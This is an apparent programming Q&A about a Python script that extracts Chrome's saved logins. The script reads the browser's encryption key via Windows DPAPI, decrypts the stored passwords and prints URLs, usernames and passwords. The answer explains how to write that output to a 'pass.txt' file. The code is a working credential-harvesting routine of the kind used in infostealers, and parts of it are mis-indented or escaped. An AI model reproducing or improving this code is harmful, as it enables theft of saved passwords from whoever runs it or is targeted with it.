# Writing None in a new file using python

Tags: python, string, file, output, nonetype

Writing None in a file using python

When I try to put the main output in a new file of this code

```
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta

    def get_chrome_datetime(chromedate):
        """Return a `datetime.datetime` object from a chrome format datetime
        Since `chromedate` is formatted as the number of microseconds since January, 1601"""
        return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():
    local_state_path = os.path.join(os.environ\["USERPROFILE"\],
                                    "AppData", "Local", "Google", "Chrome",
                                    "User Data", "Local State")
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state = f.read()
        local_state = json.loads(local_state)

    # decode the encryption key from Base64
    key = base64.b64decode(local_state\["os_crypt"\]\["encrypted_key"\])
    # remove DPAPI str
    key = key\[5:\]
    # return decrypted key that was originally encrypted
    # using a session key derived from current user's logon credentials
    # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)\[1\]

def decrypt_password(password, key):
    try:
        # get the initialization vector
        iv = password\[3:15\]
        password = password\[15:\]
        # generate cipher
        cipher = AES.new(key, AES.MODE_GCM, iv)
        # decrypt password
        return cipher.decrypt(password)\[:-16\].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)\[1\])
        except:
            # not supported
            return ""

def main():
    # get the AES key
    key = get_encryption_key()
    # local sqlite Chrome database path
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                            "Google", "Chrome", "User Data", "default", "Login Data")
    # copy the file to another location
    # as the database will be locked if chrome is currently running
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    # `logins` table has the data we need
    cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
    # iterate over all rows
    for row in cursor.fetchall():
        origin_url = row[0]
        action_url = row[1]
        username = row[2]
        password = decrypt_password(row[3], key)
        date_created = row[4]
        date_last_used = row[5]        
        if username or password:
            print(f"Origin URL: {origin_url}")
            print(f"Action URL: {action_url}")
            print(f"Username: {username}")
            print(f"Password: {password}")
        else:
            continue
        if date_created != 86400000000 and date_created:
            print(f"Creation date: {str(get_chrome_datetime(date_created))}")
        if date_last_used != 86400000000 and date_last_used:
            print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
        print("="*50)
    cursor.close()
    db.close()
    try:
        # try to remove the copied db file
        os.remove(filename)
    except:
        pass

if __name__ == "__main__":     main()

with open('pass.txt', 'a') as x:

   x.write(main())
```

I got this error

```
x.write(main()) TypeError: write() argument must be str, not None
```

how can I fixit?? plz help

Comment: `main` does not return anything / returns None and you try to write that into the file.

Comment: what do you want to put in file? You have to assign it to `variable` as single string  and at the end of `main()` use `return variable`

Comment: You're calling `main()` twice -- once in the `if` statement, and then again in the `with` block. Do you really want to run it multiple times?

Answer (score 0):

The problem is that the `main` function returns nothing.

While there are many ways to achieve what you are trying to do, I would suggest the following:

1. Open the file at the **top** of your main function

```
def main():
    f = open('pass.txt', 'a')
    # main function code
```

2. Add a `file` parameter to every call of the `print` function. For example:

```
print(f"Origin URL: {origin_url}", file=f)
```

3. Don't forget to close the file at the end of the `main` function

```
def main():
    # main function code
    f.close()
```

This way, you have more control over what output goes in the file and what output shows at your console for other purposes.